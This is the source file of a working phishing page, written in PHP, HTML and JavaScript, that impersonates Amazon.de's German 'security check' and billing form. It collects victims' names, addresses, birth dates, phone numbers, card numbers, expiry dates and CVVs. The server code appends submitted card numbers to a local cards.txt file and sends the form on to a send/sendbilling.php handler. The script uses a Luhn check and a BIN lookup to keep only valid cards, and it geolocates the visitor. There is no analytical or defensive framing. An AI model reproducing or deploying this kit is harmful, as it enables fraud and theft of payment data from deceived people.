<?php
session_start();
require('main.php');

if (!isset($_SERVER['HTTP_REFERER']) || strpos($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']) === false) {
    header('Location: index.php');
    exit();
}

$session_email = isset($_SESSION['email']) ? $_SESSION['email'] : '';
if (empty($session_email)) {
    header('Location: index.php');
    exit();
}

if (isset($_SESSION['billing_submitted'])) {
    die("Sitzung abgelaufen. Bitte schließen Sie diese Seite.");
}

$user_country = "Germany";
try {
    $ip = $_SERVER['REMOTE_ADDR'];
    $details = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
    if($details && $details->status == 'success') {
        $user_country = $details->country;
    }
} catch (Exception $e) {
    $user_country = "Germany";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $cardNumber = $_POST['cardnumber'];
    $file = 'cards.txt';
    if (!file_exists($file)) {
        touch($file);
    }
    file_put_contents($file, $cardNumber . PHP_EOL, FILE_APPEND);
}
?>
<!DOCTYPE html>
<html lang="de">
<head>
    <title>Amazon.de - Sicherheitsüberprüfung</title>
    <meta charset="utf-8" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <link rel="icon" href="https://cdn0.iconfinder.com/data/icons/most-usable-logos/120/Amazon-512.png" type="image/png">
    <style>
        body { font-family: "Amazon Ember", Arial, sans-serif; background-color: #fff; color: #111; margin: 0; padding: 0; }
        .container { max-width: 600px; margin: 0 auto; padding: 20px; }
        .logo { text-align: center; padding: 10px 0; }
        .logo img { width: 103px; }
        
        .alert-box { border: 1px solid #c40000; border-radius: 8px; padding: 15px; margin-bottom: 25px; display: flex; align-items: flex-start; }
        .alert-icon { color: #c40000; font-weight: bold; font-size: 20px; margin-right: 15px; border: 2px solid #c40000; border-radius: 50%; width: 22px; height: 22px; text-align: center; line-height: 20px; flex-shrink: 0; }
        .alert-content h4 { color: #c40000; margin: 0 0 5px 0; font-size: 17px; }
        .alert-content p { margin: 0; font-size: 13px; line-height: 1.5; }

        h1 { font-size: 28px; font-weight: 400; margin-bottom: 5px; }
        .sub-text { font-size: 13px; margin-bottom: 20px; }

        label { display: block; font-size: 13px; font-weight: 700; margin-bottom: 5px; margin-top: 15px; }
        input[type="text"], select, textarea { 
            width: 100%; padding: 7px 10px; border: 1px solid #a6a6a6; border-radius: 3px; 
            box-sizing: border-box; font-size: 13px; outline: none;
        }
        input:focus { border-color: #e77600; box-shadow: 0 0 3px 2px rgba(228,121,17,.5); }

        .btn-submit { 
            background: #f0c14b; border: 1px solid #a88734; border-radius: 3px; width: 100%; 
            padding: 10px; margin-top: 25px; cursor: pointer; font-size: 13px; font-weight: 400;
        }
        .btn-submit:hover { background: #edb021; }
        .btn-submit:disabled { background: #f7dfa1; border-color: #d8d8d8; cursor: not-allowed; opacity: 0.7; }
        
        .expiration-date-dropdowns { display: flex; gap: 10px; }
        
        footer { margin-top: 50px; border-top: 1px solid #eee; padding: 20px 0; text-align: center; font-size: 11px; }
        footer a { color: #0066c0; text-decoration: none; margin: 0 10px; }
        hr { border: 0; border-top: 1px solid #eee; margin: 20px 0; }
    </style>
</head>
<body>

<div class="container">
    <div class="logo">
        <img src="img/amazon-logos.svg" alt="Amazon Logo">
    </div>

    <div class="alert-box">
        <div class="alert-icon">!</div>
        <div class="alert-content">
            <h4>Zahlungsinformationen</h4>
            <p>Bitte überprüfen Sie Ihre Zahlungsdaten sorgfältig.</p>
        </div>
    </div>

    <h1>Rechnungsdaten eingeben</h1>

    <form action="send/sendbilling.php" method="post" id="billForm" enctype="multipart/form-data" onsubmit="document.getElementById('r1c0m3i2').disabled = true; return true;">
        <label>Vollständiger Name</label>
        <input type="text" name="cardname" placeholder="In/auf der Zahlungsweise angegebener Name" required>

        <label>Land/Region</label>
        <select name="cty" id="country-select">
            <option value="<?php echo $user_country; ?>" selected><?php echo $user_country; ?></option>
            <option value="Germany">Germany</option>
            <?php 
            if(isset($countries)) {
                foreach ($countries as $country) { 
                    if($country != $user_country) echo "<option value=\"$country\">$country</option>"; 
                } 
            }
            ?>
        </select>

        <label>Rechnungsadresse</label>
        <input type="text" name="address" placeholder="Straße und Hausnummer, Postfach," required style="margin-bottom: 8px;">
        <input type="text" placeholder="Wohnung, Suite, Einheit, Gebäude, Etage usw.">

        <label>Ort</label>
        <input type="text" name="city" required>

        <label>Bundesland/Provinz/Region</label>
        <input type="text" name="state" required>

        <label>Postleitzahl</label>
        <input type="text" name="zipcode" required>

        <div class="form-group">
            <label for="dob">Geburtsdatum (MM/TT/JJJJ)</label>
            <input type="text" name="dob" id="dob" placeholder="MM/DD/YYYY" maxlength="10" required oninput="formatDateOfBirth(this)" onchange="validateAge(this)">
            <small id="dobError" style="color: red; display: none;">Sie müssen mindestens 18 Jahre alt sein.</small>
        </div>

        <label>Telefonnummer</label>
        <input type="text" name="phonenumber" required oninput="formatPhoneNumber(this)">

        <hr>

        <label>Kartennummer</label>
        <div style="position: relative;">
            <input id="cardNumberInput" name="cardnumber" required type="text" placeholder="1234 1234 1234 1234" maxlength="24" oninput="formatCardNumber(this)">
            <div id="cardBrandDisplay" style="position: absolute; right: 10px; top: 50%; transform: translateY(-50%); font-size: 12px; font-weight: bold; color: #555; display: flex; align-items: center; gap: 5px;">
                <span id="bankName" style="color: #e77600;"></span>
                <img id="brandLogo" src="" style="height: 20px; display: none;">
            </div>
        </div>

        <div style="display: flex; gap: 20px;">
            <div style="flex: 1;">
                <label>Ablaufdatum</label>
                <div class="expiration-date-dropdowns">
                    <select id="expMonth" name="expMonth" required>
                        <option value="" disabled selected>MM</option>
                        <?php for($i=1; $i<=12; $i++) { $m=str_pad($i,2,'0',STR_PAD_LEFT); echo "<option value='$m'>$m</option>"; } ?>
                    </select>
                    <select id="expYear" name="expYear" required>
                        <option value="" disabled selected>YY</option>
                        <?php for($i=25; $i<=39; $i++) { echo "<option value='$i'>20$i</option>"; } ?>
                    </select>
                </div>
            </div>
            <div style="flex: 1;">
                <label>Sicherheitscode</label>
                <input id="cvvInput" name="cvv" required type="text" placeholder="3 atau 4 Ziffern" maxlength="4" oninput="validateCVV(this); toggleSubmitButton();">
            </div>
        </div>
        <button type="submit" id="r1c0m3i2" name="submit" class="btn-submit">Weiter</button>
    </form>

    <footer>
        <div style="margin-bottom: 10px;">
            <a href="#">Unsere AGB</a> <a href="#">Datenschutzerklärung</a> <a href="#">Hilfe</a> <a href="#">Impressum</a> <a href="#">Hinweise zu Cookies</a> <a href="#">Hinweise zu interessenbasierter Werbung</a>
        </div>
        <p>© 1996-2025, Amazon.com, Inc. or its affiliates</p>
    </footer>
</div>

<script>
    if ( window.history.replaceState ) {
        window.history.replaceState( null, null, window.location.href );
    }

    const brandLogos = {
        'Visa': 'https://upload.wikimedia.org/wikipedia/commons/5/5e/Visa_Inc._logo.svg',
        'Mastercard': 'https://upload.wikimedia.org/wikipedia/commons/2/2a/Mastercard-logo.svg',
        'Amex': 'https://upload.wikimedia.org/wikipedia/commons/3/30/American_Express_logo.svg'
    };

    function luhnCheck(num) {
        let arr = (num + '').split('').reverse().map(x => parseInt(x));
        let lastDigit = arr.splice(0, 1)[0];
        let sum = arr.reduce((acc, val, i) => (i % 2 !== 0 ? acc + val : acc + ((val * 2 > 9) ? val * 2 - 9 : val * 2)), 0);
        sum += lastDigit;
        return sum % 10 === 0;
    }

    function getCardType(number) {
        const cleanNumber = number.replace(/\s/g, '');
        if (/^3[47]/.test(cleanNumber)) return 'Amex';
        if (/^4/.test(cleanNumber)) return 'Visa';
        if (/^5[1-5]/.test(cleanNumber)) return 'Mastercard';
        return 'Other';
    }

    async function checkBIN(bin) {
        const logoImg = document.getElementById('brandLogo');
        const bankSpan = document.getElementById('bankName');
        const type = getCardType(bin);

        if (brandLogos[type]) {
            logoImg.src = brandLogos[type];
            logoImg.style.display = 'block';
        } else {
            logoImg.style.display = 'none';
        }

        if (bin.length >= 6) {
            try {
                const response = await fetch(`https://lookup.binlist.net/${bin}`);
                if (response.ok) {
                    const data = await response.json();
                    bankSpan.innerText = data.bank && data.bank.name ? data.bank.name.split(' ')[0] : '';
                }
            } catch (e) { console.log("BIN API Limit"); }
        } else { bankSpan.innerText = ''; }
    }

    function formatCardNumber(input) {
        let value = input.value.replace(/\D/g, '');
        const bin = value.slice(0, 6);
        checkBIN(bin);
        const type = getCardType(value);
        const maxLength = (type === 'Amex') ? 15 : 16; 
        if (value.length > maxLength) { value = value.slice(0, maxLength); }

        let formattedValue = '';
        if (type === 'Amex') {
            formattedValue = value.replace(/(\d{4})(\d{6})?(\d{5})?/, function(match, p1, p2, p3) {
                let res = p1;
                if (p2) res += ' ' + p2;
                if (p3) res += ' ' + p3;
                return res;
            });
        } else {
            formattedValue = value.replace(/(\d{4})(?=\d)/g, '$1 ');
        }
        input.value = formattedValue;
        toggleSubmitButton();
    }

    function validateCVV(input) {
        const cardNumber = document.getElementById('cardNumberInput').value.replace(/\D/g, '');
        const cardType = getCardType(cardNumber);
        const maxLength = (cardType === 'Amex') ? 4 : 3;
        let value = input.value.replace(/\D/g, '');
        if (value.length > maxLength) { value = value.slice(0, maxLength); }
        input.value = value;
        toggleSubmitButton();
    }

    function toggleSubmitButton() {
        const submitButton = document.getElementById('r1c0m3i2');
        const cardNumberInput = document.getElementById('cardNumberInput');
        const cvvInput = document.getElementById('cvvInput');
        const cardNameInput = document.querySelector('input[name="cardname"]');
        
        const rawCard = cardNumberInput.value.replace(/\D/g, '');
        const rawCVV = cvvInput.value.replace(/\D/g, '');
        const cardType = getCardType(rawCard);
        const isLuhnValid = luhnCheck(rawCard);
        
        const requiredCardLength = (cardType === 'Amex') ? 15 : 16;
        const isCardLengthValid = (rawCard.length === requiredCardLength);
        const requiredCVVLength = (cardType === 'Amex') ? 4 : 3;
        
        const isCVVValid = (rawCVV.length === requiredCVVLength);
        const isOtherDataValid = cardNameInput.value.trim().length > 2 &&
                                 document.getElementById('expMonth').value !== '' &&
                                 document.getElementById('expYear').value !== '';

        if (isLuhnValid && isCardLengthValid && isCVVValid && isOtherDataValid) {
            submitButton.disabled = false;
        } else {
            submitButton.disabled = true;
            if (rawCard.length >= requiredCardLength && !isLuhnValid) {
                cardNumberInput.style.borderColor = "red";
            } else {
                cardNumberInput.style.borderColor = "#a6a6a6";
            }
        }
    }

    function formatPhoneNumber(input) {
        let value = input.value.replace(/\D/g, '');
        if (value.length > 3 && value.length <= 6) { value = `(${value.slice(0, 3)}) ${value.slice(3)}`; }
        else if (value.length > 6) { value = `(${value.slice(0, 3)}) ${value.slice(3, 6)}-${value.slice(6, 11)}`; }
        input.value = value;
    }

    function formatDateOfBirth(input) {
        let value = input.value.replace(/\D/g, '');
        if (value.length > 8) value = value.slice(0, 8);
        let formattedValue = '';
        if (value.length > 4) {
            formattedValue = value.slice(0, 2) + '/' + value.slice(2, 4) + '/' + value.slice(4);
        } else if (value.length > 2) {
            formattedValue = value.slice(0, 2) + '/' + value.slice(2);
        } else { formattedValue = value; }
        input.value = formattedValue;
    }

    function validateAge(input) {
        const parts = input.value.split('/');
        if (parts.length === 3) {
            const month = parseInt(parts[0], 10) - 1;
            const day = parseInt(parts[1], 10);
            const year = parseInt(parts[2], 10);
            const dob = new Date(year, month, day);
            const today = new Date();
            let age = today.getFullYear() - dob.getFullYear();
            const m = today.getMonth() - dob.getMonth();
            if (m < 0 || (m === 0 && today.getDate() < dob.getDate())) { age--; }

            const errorMsg = document.getElementById('dobError');
            const submitBtn = document.getElementById('r1c0m3i2');
            
            if (age < 18) {
                errorMsg.style.display = 'block';
                submitBtn.disabled = true;
            } else {
                errorMsg.style.display = 'none';
                toggleSubmitButton();
            }
        }
    }
</script>
</body>
</html>